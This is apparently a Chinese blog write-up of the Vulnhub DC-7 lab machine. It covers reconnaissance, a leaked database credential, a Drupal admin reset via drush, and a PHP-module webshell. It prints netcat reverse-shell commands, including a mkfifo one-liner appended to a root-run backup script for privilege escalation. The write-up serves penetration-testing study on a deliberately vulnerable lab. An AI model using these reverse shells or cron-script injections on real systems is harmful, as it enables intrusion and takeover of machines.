Vulnhub靶机渗透学习——DC-7

Vulnhub靶机

Vulnhub靶机下载:/
官网地址:https://download.vulnhub.com/dc/DC-7.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware 打开即可。
DC-7:只有一个最终的flag,只有拿到root权限才可以发现最终的flag。

环境准备

攻击机:kali
靶机:DC-7
同一网卡

DC-7 靶机渗透

信息收集

kali里使用netdiscover发现主机(快一点)

netdiscover -i eth0 -r 192.168.0.0/24 

image.png
当然也可以用 nmap探测整个虚拟机网段存活主机,发现靶机ip:

nmap -sP -PI -PT 192.168.0.1/24

image.png
使用 nmap 探测开放端口及服务

nmap -sCV 192.168.0.137 -p-

image.png
同样也是开放了 22 和 80 端口,浏览器访问 80
image.png
发现又是 Drupal,主页有一段话

DC-7引入了一些“新”概念,但我把它们留给你自己去弄清楚是什么。虽然这个挑战并不全是技术性的,但如果你需要诉诸暴力强迫或字典攻击,你可能不会成功。你要做的,就是跳出思维定势。“跳出”框框

回到靶场描述https://www.vulnhub.com/entry/dc-7,356/发现说的一样
image.png

审计泄露

这里作者的意思让我们跳出传统渗透思路,从白盒审计入手,在主页左下角有作者的名字,直接 google 搜索
image.png
发现其 github 及 twitter
image.png

这是DC-7挑战的一些“代码”(是的,它不是最好的代码,但这不是重点)。
顺便说一句,这不是一面旗帜,但如果你来到这里,无论如何都做得很好。:-)

发现其 githu 下只有一个项目,且给了是 DC-7 的一些源码,那就下载到本地审计一下,在 config.php 中先数据库账号密码
image.png

dc7user/MdR3xOgB7#dW

但是网站没有对外开放 3306,所以只能用此账号密码尝试网站登录或 ssh 登录
image.png
网站登录提示用户密码错误,那就只能尝试 ssh 登录
image.png
没想到就直接进入 shell 了,不过只是一个普通用户,收集下信息

sudo -l
find / -perm -u=s -type f 2>/dev/null

image.png
利用https://github.com/The-Z-Labs/linux-exploit-suggester扫内核漏洞发现有个高可能性的,但是由于靶场环境不能 gcc 编译,要运行 poc 得搭建同样的内核环境,太麻烦就没做尝试
image.png
继续翻找用户目录看看,在当前用户目录下,有个 backups 和 mbox,很熟悉进去看看发现两个.gpg 文件,没见过这类文件,不知道是干嘛的
image.png
于是问了下 chatgpt:大概意思是经过加密后的文件
image.png
在另一个文件 mbox 发现了些信息有个/opt/scripts/backups.sh 脚本文件
image.png
cat 查看一下
image.png
看不太懂,交给 chatgpt
image.png

Drush 重置管理员密码

这里尝试利用 drush 命令来修改网站 admin 用户密码

cd /var/www/html/

drush user-password admin --password="123456"

image.png
显示修改成功,进入网站登录看看
image.png

Drupal 8-getshell

成功进来了,然后呢,然后不知道咋搞了,参考其他大佬文章,直接添加 php 代码反弹 shell,但发现Drupal 8不支持PHP代码,为了安全,需要将php单独作为一个模块导入。
image.png

https://www.drupal.org/project/php   //Php介绍页面如下
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz //模块包下载地址

进入 extend 安装
image.png
image.png
选择FILTERS,勾选PHP点击Install安装,安装成功后会有提示
image.png
image.png
接下来就直接写 webshellimage.png
蚁剑连接
image.png
nc 反弹一手 shell 方便后续操作

nc -e /bin/bash 192.168.0.10 4444

image.png
老规矩 python 稳定 shell

which python
python -c 'import pty;pty.spawn("/bin/bash")'

image.png
现在用户变为了 www-date,依旧是普通权限

提权

接下来提权还是需要用到前面发现的 backups.sh 脚本,可以看一下所属用户和组
image.png
发现其所属 www-date组,www-date 用户可以对这个脚本文件进行操作,既然如此就写入 nc 反弹命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.10 4444 >/tmp/f" >> backups.sh

image.png
手动执行
image.png
image.png
这里不对啊,不能当前用户手动执行不然还是当前用户,参考大佬文章说,这个脚本由 root 用户定时 15 分钟执行一次,所以写入反弹命令后,开启监听静静等待其自动执行就可以了,从之前的那个 mbox 文件可以分析出来
image.png
等待其自动执行反弹 shell
image.png
这不就来了吗,顺便看了一下自动任务,果然

crontab -l

image.png

获取 flag

image.png

靶场总结

  1. 白盒源码审计泄露
  2. Drush 重置管理员密码
  3. Drupal 8 后台-getshell 方式
  4. 通过由 root 用户定时执行脚本提权

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值